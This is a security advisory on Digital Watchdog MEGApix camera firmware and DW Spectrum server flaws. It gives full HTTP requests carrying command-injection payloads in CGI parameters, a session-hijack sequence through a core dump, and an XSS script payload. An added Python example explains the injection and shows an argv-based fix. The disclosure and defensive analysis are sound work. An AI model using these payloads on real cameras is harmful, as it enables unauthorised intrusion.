CVE-2022-34540: dw_vulns.txt
Digital Watchdog DW MEGApix IP cameras running firmware A7.2.2_20211029 were discovered to contain a command injection vulnerability in the component /admin/vca/license/license_tok.cgi (reached on the camera as /cgi-bin/admin/vca/license/license_tok.cgi in the advisory below). This vulnerability is exploitable via a crafted POST request.
The following issue was found on DW Spectrum server software ver 4.2.0.32842

Information Disclosure:

1. API call displays internal paths, IPs, OS version and architecture.
   http://<SERVER IP>:7001/api/moduleInformation

All issues below were found on A7.2.2_20211029 firmware of MegaPix IP Camera by Digital Watchdog.

The following issues were found through unauthenticated URLs:

Information Disclosure:

1. Web files display internal paths and scripts, software versions (CWE-201)
   http://192.168.1.80/plugin_info_list.xml
   http://192.168.1.80/plugin/plugin_web.conf
   http://192.168.1.80/plugin/port.conf

2. Information disclosure and session hijacking through core log (CWE-201)
   Step 1. Generate a 500 error from an authenticated session by going to 192.168.1.80/cgi-bin/result?msubmenu=event&action
   Step 2. Get the core file by going to 192.168.1.80/cgi-bin/core
   Step 3. Use the session token information from the error event to log into the admin pages

The following issues were found through authenticated URLs:

1. Command injection on curltest.cgi web file
   http://192.168.1.80/cgi-bin/admin/curltest.cgi
   -injectable on test[] parameters smtp_addr, smtp_port, sender, receiver, id, and pass

   POST /cgi-bin/admin/curltest.cgi?smtp HTTP/1.1
   Host: 192.168.1.80
   User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
   Accept: */*
   Accept-Language: en-US,en;q=0.5
   Accept-Encoding: gzip, deflate
   Content-Type: application/x-www-form-urlencoded; charset=UTF-8
   X-Requested-With: XMLHttpRequest
   Content-Length: 299
   Origin: http://192.168.1.80
   Authorization: Digest username="admin", realm="IP Camera", nonce="5fdb55be:74a954dee4e18d4598f921815cfda122", uri="/cgi-bin/admin/curltest.cgi?smtp", response="36f619b490b3f5b6cc381f3c80249f2c", qop=auth, nc=0000007d, cnonce="c0b5e7ad8a3ce8b7"
   Connection: close
   Referer: http://192.168.1.80/cgi-bin/admin/setup_main.cgi

   test%5Benabled%5D=1&test%5Bsmtp_addr%5D=192.168.1.5:444';touch%20./test.txt;curl%20--url%20'http://192.168.1.5&test%5Bssl_enable%5D=0&test%5Bsmtp_port%5D=444&test%5Bssl_port%5D=465&test%5Bid%5D=a&test%5Bpass%5D=a&test%5Bsender%5D=test&test%5Breceiver%5D=test&test%5Btitle%5D=hi&test%5Bmessage%5D=hi

2. Command injection on addacph.cgi web file (CWE-94)
   http://192.168.1.80/cgi-bin/admin/vca/bia/addacph.cgi
   -injectable on event, id, pluginname, name, and evt_id parameters

   GET /cgi-bin/admin/vca/bia/addacph.cgi?mod&event=a&id=1&pluginname=;%20echo%20'test'>test.html%20;&name=a&evt_id=a

3. Command injection on license_tok.cgi web file (CWE-94)
   http://192.168.1.80/cgi-bin/admin/vca/license/license_tok.cgi
   -injectable on POST guid, license_value, and plugin_info parameters

   POST /cgi-bin/admin/vca/license/license_tok.cgi?getToken HTTP/1.1
   Host: 192.168.1.80
   User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
   Accept: */*
   Accept-Language: en-US,en;q=0.5
   Accept-Encoding: gzip, deflate
   Content-Type: application/x-www-form-urlencoded; charset=UTF-8
   X-Requested-With: XMLHttpRequest
   Content-Length: 96
   Origin: http://192.168.1.80
   Authorization: Digest username="admin", realm="IP Camera", nonce="5fe1c519:e61374f2ea956e03c278894d036fc0ef", uri="/cgi-bin/admin/curltest.cgi?smtp", response="53219d6b6a8afdffb3fbbfd9a17dcf98", qop=auth, nc=0000068c, cnonce="960aed74a9bd1476"
   Connection: close
   Referer: http://192.168.1.80/cgi-bin/admin/setup_main.cgi

   guid='555 http://127.0.0.1;%20echo 'test'>test.html%20;curl -k -d guid=555'&license_value='fff'

4. XSS vulnerability in bia_oneshot.cgi web file (CWE-79)
   http://192.168.1.80/cgi-bin/admin/vca/bia/bia_oneshot.cgi?blob=%3Chtml%3E%3Cscript%3Ealert(%27test%27)%3C/script%3E%3C/html%3E
   -file contents injection allows persistent XSS through blob parameter
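The three command injections above (curltest.cgi, addacph.cgi, license_tok.cgi) are the same defect: a CGI parameter is interpolated into a command string that a shell then parses. The example below is added here and is not part of the advisory or of the camera firmware. It takes the curltest.cgi POST body from the advisory, shows how many separate commands a POSIX shell would run if the smtp_addr value were pasted into a quoted curl invocation, and contrasts that with an argv-based build in which the same value is one inert argument. The curl template, the function names and the host[:port] allow-list are assumptions of this example; the advisory does not show what curltest.cgi actually executes. Requires Python 3.8+ for shlex punctuation handling.

```python
"""
Added example (not from the advisory or Digital Watchdog's firmware): why the
curltest.cgi smtp_addr payload turns one curl command into three shell
commands when a CGI builds a shell string by interpolation, and how an
argv-based build keeps the same input inert. The command template below is a
hypothetical stand-in for whatever curltest.cgi really runs.
"""
import re
import shlex
from urllib.parse import unquote_plus

# POST body of the advisory's curltest.cgi request, transcribed from the page.
POST_BODY = (
    "test%5Benabled%5D=1"
    "&test%5Bsmtp_addr%5D=192.168.1.5:444';touch%20./test.txt;curl%20--url%20'http://192.168.1.5"
    "&test%5Bssl_enable%5D=0&test%5Bsmtp_port%5D=444&test%5Bssl_port%5D=465"
    "&test%5Bid%5D=a&test%5Bpass%5D=a&test%5Bsender%5D=test&test%5Breceiver%5D=test"
    "&test%5Btitle%5D=hi&test%5Bmessage%5D=hi"
)


def parse_form(body):
    """Minimal application/x-www-form-urlencoded parser: split on '&' only,
    so the ';' inside the payload survives as data (older parse_qs versions
    would have split on it as well)."""
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def build_shell_command(p):
    """Vulnerable pattern (hypothetical template): parameters interpolated into
    one string that is then handed to /bin/sh, e.g. via system() or popen()."""
    return (
        "curl --url 'smtp://%s' --mail-from '%s' --mail-rcpt '%s' --user '%s:%s'"
        % (p["test[smtp_addr]"], p["test[sender]"], p["test[receiver]"],
           p["test[id]"], p["test[pass]"])
    )


def shell_commands(cmdline):
    """Tokenise the string the way a POSIX shell would and split it at ';'
    so the separate commands the shell would run become visible."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    commands, current = [], []
    for token in lex:
        if token == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def build_argv(p):
    """Hardened form: an argv list run without a shell (subprocess.run(argv)
    or execve). The whole smtp_addr value is a single argument to curl; no
    interpreter ever sees the ';' or the quotes."""
    return [
        "curl", "--url", "smtp://" + p["test[smtp_addr]"],
        "--mail-from", p["test[sender]"], "--mail-rcpt", p["test[receiver]"],
        "--user", "%s:%s" % (p["test[id]"], p["test[pass]"]),
    ]


# Defence in depth (assumed policy): allow-list what an SMTP host[:port] may look like.
HOST_PORT = re.compile(r"^[A-Za-z0-9.-]+(:\d{1,5})?$")


def valid_smtp_addr(value):
    return HOST_PORT.match(value) is not None


if __name__ == "__main__":
    params = parse_form(POST_BODY)
    for cmd in shell_commands(build_shell_command(params)):
        print("shell would run:", cmd)
    print("argv form:", build_argv(params))
    print("smtp_addr passes allow-list:", valid_smtp_addr(params["test[smtp_addr]"]))
```

The tokeniser output is the check to run when reviewing a CGI's command construction: if a parameter value can change the number of commands a shell sees, quoting in the template is not a fix, because the attacker closes the quote and reopens it, as the smtp_addr payload does. Only an argv interface with no shell, plus an allow-list on the value, removes the problem.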